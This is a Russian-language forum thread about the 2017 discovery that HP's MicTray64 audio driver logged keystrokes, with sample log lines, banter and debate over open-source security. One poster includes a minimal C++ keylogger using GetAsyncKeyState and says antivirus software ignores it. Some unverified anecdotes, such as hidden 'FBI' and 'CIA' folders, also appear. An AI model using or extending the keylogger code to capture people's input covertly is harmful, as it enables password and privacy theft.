Боже да всем насрать! Я уже давно понял, что в нынешнем мире, чем меньше хранишь на компе тем лучше. Максимум на ЯПе темы позырить и список продуктов для магаза! :)
А почему этим занимается звуковой драйвер, а не клавиатурный? Где логика?
звуковой драйвер ловит хоткеи, чтоб управлять звуком.
Это-то понятно. Не понятно, зачем он его в файл пишет) Вот тут-то и закрадываются нехорошие подозрения)) Ну слушаешь ты нажатые клавиши, услышал ненужные - пофиг, услышал нужную - выполнил действие. Писать-то это все зачем?
Я ещё и кабель ростелекомовский рубанул,шоб на 100 % ваще всё.
Не надо нагнетать. Все это делается для нашего же блага, в целях борьбы с международным терроризмом. Как известно, Аль-Кайда и Игил питают слабость к технике HP. Вот американская компания и приняла меры, чтобы собирать пароли с пользователей. Таким образом, АНБ скоро найдет пароли террористческий ячеек, засевших в США и Еворпе и готовящих теракты против невинных людей.
Ага! Эти злодеи вообще к любой технике тяготеют! И на iOs'e, и на Винде, и на Андроиде... Полигамные техникофилы, а не воины Аллаха! Это сообщение отредактировал brync - 16 мая 2017 г. в 17:26
А почему этим занимается звуковой драйвер, а не клавиатурный? Где логика?
звуковой драйвер ловит хоткеи, чтоб управлять звуком.
Это-то понятно. Не понятно, зачем он его в файл пишет) Вот тут-то и закрадываются нехорошие подозрения)) Ну слушаешь ты нажатые клавиши, услышал ненужные - пофиг, услышал нужную - выполнил действие. Писать-то это все зачем?
не успевает, панимаш, пока кнопа нажалась, надо сделать соответствующее событие. В этот момент снова кнопа нажалась, пока делалось событие, прога пропустила нажатие следующей кнопы и программа облажалась, чё не понятно? Надо записывать, потом неспешно все события выпонять, мало ли...
Еще не набежали "кому-мы-нужны-это-все-шизофрения"? ))))) Странно))))) Я думал, что они всегда, даже не по теме доказывают, что все сделанное - для удобства пользователя. Хотя, в целом они правы, вопрос только для какого пользователя)))))
Кейлоггер может с завода стоять закладкой хоть в южном мосту, хоть в любом официальном драйвере, в любой официальной программе. Хоть даже в Амиго и Яндек-Баре.
Ты че сказал, нехристь?! С Амиго такого быть не может!!!
Ага, если только у тебя весь софт собран тобою из кода, который ты смотрел. Стоит на сутки заменить код в репозитории на исправленный, а потом вернуть назад чистый - и тысячи ничего не подозревающих юзеров получат софт из открытого кода с трояном. И потом - кто контроллирует сборщиков пакетов для дистрибутивов? Что толку от открытого кода, если ты поставил из пакета?
Ага. А ты попробуй этот код вернуть)) Я же спецом написал - стейбл. Это даже не анстейбл будет, а экспериментал. Проверяют и постят все ментейнеры. Они же повышают ранг дистрибутива после тестов. Там все не так просто. "Изменить" не прокатит. А код видят тысячи пользователей, которые знают как его читать - поэтому да, отчасти стабильный открытый код - наилучшая гарантия.
А уж если очень надо зашифроваться, то реализовать гостовый алгоритм - не сверхсложная задача. Зато в нем нет бекдоров.
Так и надежность его для профессионала будет низкой, если вы конечно не из тех единиц математиков-криптографов.
Дааа? Вот сейчас по всему миру заплакали жертвы всех Рансомов вообще и ВоннаКрай персольнально. Они все используют штатное шифрование винды и хер ты это PGP откроешь. точнее, если откроешь, то Нобелевская Премия Мира гарантирована (за вклад в математику нету).
ЗЫ Точнее теория не запрещает, но таких вычислительных мощностей нет в сумме. Хоть всеми компами и смартами считай. А если вдруг появятся, то увеличат длинну ключа и опять писец-невскрываемо. Только брутфорс. Алгоритма нет чисто из теории.
ЗЗЫ 4линуксоиды. PGP придумывалось под UNIX- у вас точно такой же модуль шифрования, только права получить сложнее (и то уже не факт). В винде воще дофига всего сперто из униха. Начинаешь отслеживать зависимости: класс-обертка, в нем еще обертка, в нем еще 5... "бля, я это уже видел!"- стандартный никсовый tcpip.h (даже коменты теже стоят, сравнивал с тем же хидером в QNX)...
Это сообщение отредактировал lumy - 16 мая 2017 г. в 18:55
MicTray64.exe(tid 994) 104946:[ J_STATE] - Mic target 0x1 scancode 0x13 flags 0x0 extra 0x0 vk 0x52
MicTray64.exe(tid 994) 105008:[ J_STATE] - Mic target 0x1 scancode 0x13 flags 0x80 extra 0x0 vk 0x52
MicTray64.exe(tid 994) 105070:[ J_STATE] - Mic target 0x1 scancode 0x16 flags 0x0 extra 0x0 vk 0x55
MicTray64.exe(tid 994) 105133:[ J_STATE] - Mic target 0x1 scancode 0x16 flags 0x80 extra 0x0 vk 0x55
MicTray64.exe(tid 994) 105570:[ J_STATE] - Mic target 0x1 scancode 0x2e flags 0x0 extra 0x0 vk 0x43
MicTray64.exe(tid 994) 105616:[ J_STATE] - Mic target 0x1 scancode 0x2e flags 0x80 extra 0x0 vk 0x43
MicTray64.exe(tid 994) 105913:[ J_STATE] - Mic target 0x1 scancode 0x23 flags 0x0 extra 0x0 vk 0x48
MicTray64.exe(tid 994) 105960:[ J_STATE] - Mic target 0x1 scancode 0x23 flags 0x80 extra 0x0 vk 0x48
MicTray64.exe(tid 994) 111045:[ J_STATE] - Mic target 0x1 scancode 0x2a flags 0x0 extra 0x0 vk 0xa0
Тут не все, да?) Все доступно и понятно.
Получение ключей из реестра. Как только девайс начинает юзаться открываем его, отключаем события, включаем режим оповещения дополнительного устройства (программы), дальше должно быть что-то вроде RegisterLoadEvent и дальнейшая работа)
Вы давно делали ревизию кода всех установленных у вас приложений и ядра?
Открытый код все-таки это открытый код. Всегда можно прочесть что там нафигачено. Таких двухлетних косяков в таком софте - не будет (ок, пусть будет корректнее - вероятность их крайне мала). Достаточно пользоваться стейбл версией и будет все норм) Не обязательно для этого каждому пользователю при каждой загрузке весь код операционки перелопачивать)
У линукса все-же немного другой подход к безопасности.
Ну да, потому весь мир сидел с 11 до 14 год с дырой размером с жопу порно-актрисы aka heartbleed
Что касается компании HP, то ее представители уже ознакомились с проблемой и заявили, что сотрудники ликвидируют проблему в ближайшее время. «Мы нашли решение и сделаем его доступным для наших пользователей», — заявили в компании.
Они, блядь, ознакомились с проблемой! Хуйли с ней знакомиться - она у вас (я про компанию) в технической документации подробно описана. Но особо эпично то, что эти ахуевшие нашли решение! Они нашли его, Ганс! (карл заебал уже). Небось месяц думали - как бы, блядь, решить эту нетривиальную проблему. Да просто - выпилить нахуй этот функционал и все.
Нихуя не удивлюсь, если выпиливание функционала сводится к закомментированию одной строчки кода:
Вы давно делали ревизию кода всех установленных у вас приложений и ядра?
Открытый код все-таки это открытый код. Всегда можно прочесть что там нафигачено. Таких двухлетних косяков в таком софте - не будет (ок, пусть будет корректнее - вероятность их крайне мала). Достаточно пользоваться стейбл версией и будет все норм) Не обязательно для этого каждому пользователю при каждой загрузке весь код операционки перелопачивать)
У линукса все-же немного другой подход к безопасности.
Ну да, потому весь мир сидел с 11 до 14 год с дырой размером с жопу порно-актрисы aka heartbleed
Amok555 Так что тысячи глаз и стейбл - не гарантия.
lumy Речь выше шла о самописных алгоритмах, а не технологическом стандарте. С технологическим стандартом тоже все непросто - криптография наука сложная, алгоритм проверить на коллизии непросто
Пфф, тоже мне открытие. Один фиг там каша из данных и выудить оттуда какую-то конкретную инфу тот еще гемор. Так что какой-либо взлом через это возможен только конкретно нацеленный, а если есть возможноть слямзить этот лог, то думаю можно найти возможность впаять нормальный кейлогер в систему.
Ну и так, для общего ознакомления - элементарнейший кейлогер на плюсах (тоже антивирям пофиг на такое поведение):
#include<iostream> #include<Windows.h>
int main() { bool keys[256] = { false }; while (true) { int key_code = 0; for (bool& key : keys) key = GetAsyncKeyState(key_code++); for (char c = ' '; c <= 'z'; ++c) if (keys[c]) std::cout << c; } }
когда-то давно, лет 10 назад поставил нам в контору HP партию десктопов, с предустановленной виндой. поскольку у нас винда корпоративная, предустановленную сносили и ставили свою. а я чего-то решил перед сносом заглянуть че там на винте, так вот при загрузке с CD появились папочки C:\FBI и C:\CIA которые в установленной родной винде никак не были видны :) внутри программки... к сожалению не сохранил :(
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии. Авторизуйтесь, пожалуйста, или зарегистрируйтесь, если не зарегистрированы.
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей)
Это получается что меня слышали когда я фапал перед ноутом?? 
Да и похуй-Винда похлеще сексотит, и ничего, всем похуй 
yaplakal.com